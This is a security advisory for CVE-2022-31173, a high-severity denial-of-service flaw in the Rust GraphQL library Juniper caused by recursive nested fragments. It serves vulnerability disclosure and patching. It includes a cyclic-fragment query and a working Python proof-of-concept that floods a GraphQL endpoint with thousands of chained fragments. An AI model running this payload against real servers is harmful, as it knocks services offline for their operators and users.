GHSA-4rx6-g5vg-5f3j
Suggest an improvement- Source
- https://github.com/advisories/GHSA-4rx6-g5vg-5f3j
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-4rx6-g5vg-5f3j/GHSA-4rx6-g5vg-5f3j.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-4rx6-g5vg-5f3j
- Aliases
- Related
- Published
- 2022-07-29T22:29:22Z
- Modified
- 2023-11-08T04:09:28.709254Z
- Severity
-
- 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVSS Calculator
- Summary
- Juniper is vulnerable to @DOS GraphQL Nested Fragments overflow
- Details
-
GraphQL behaviour
Nested fragment in GraphQL might be quite hard to handle depending on the implementation language. Some language support natively a max recursion depth. However, on most compiled languages, you should add a threshold of recursion.
# Infinite loop example query { ...a } fragment a on Query { ...b } fragment b on Query { ...a }POC TLDR
With maxsize being the number of nested fragment generated. At maxsize=7500, it should instantly raise:
However, with a lower size, you will overflow the memory after some iterations.
Reproduction steps (Juniper)
git clone https://github.com/graphql-rust/juniper.git cd juniperSave this POC as poc.py
import requests import time import json from itertools import permutations print('=== Fragments POC ===') url = 'http://localhost:8080/graphql' max_size = 7500 perms = [''.join(p) for p in permutations('abcefghijk')] perms = perms[:max_size] fragment_payloads = '' for i, perm in enumerate(perms): next_perm = perms[i+1] if i < max_size-1 else perms[0] fragment_payloads += f'fragment {perm} on Query' + '{' f'...{next_perm}' + '}' payload = {'query':'query{\n ...' + perms[0] + '\n}' + fragment_payloads,'variables':{},'operationName':None} headers = { 'Content-Type': 'application/json', } try: response = requests.request('POST', url, headers=headers, json=payload) print(response.text) except requests.exceptions.ConnectionError: print('Connection closed, POC worked.')cargo run [in separate shell] python3 poc.pyCredits
@c3b5aw @MdotTIM @karimhreda
- Database specific
{ "nvd_published_at": "2022-08-01T19:15:00Z", "cwe_ids": [ "CWE-400", "CWE-674" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2022-07-29T22:29:22Z" }- References
-
- https://github.com/graphql-rust/juniper/security/advisories/GHSA-4rx6-g5vg-5f3j
- https://nvd.nist.gov/vuln/detail/CVE-2022-31173
- https://github.com/graphql-rust/juniper/commit/2b609ee057be950e3454b69fadc431d120e407bb
- https://github.com/graphql-rust/juniper/commit/8d28cdba6eb10f53490ba41d1b5cb40506c2de22
- https://github.com/graphql-rust/juniper
- https://github.com/graphql-rust/juniper/blob/juniper-v0.15.10/juniper/CHANGELOG.md#01510-2022-07-28
- https://rustsec.org/advisories/RUSTSEC-2022-0038.html
Affected packages
crates.io / juniper
Package
- Name
- juniper
- View open source insights on deps.dev
- Purl
- pkg:cargo/juniper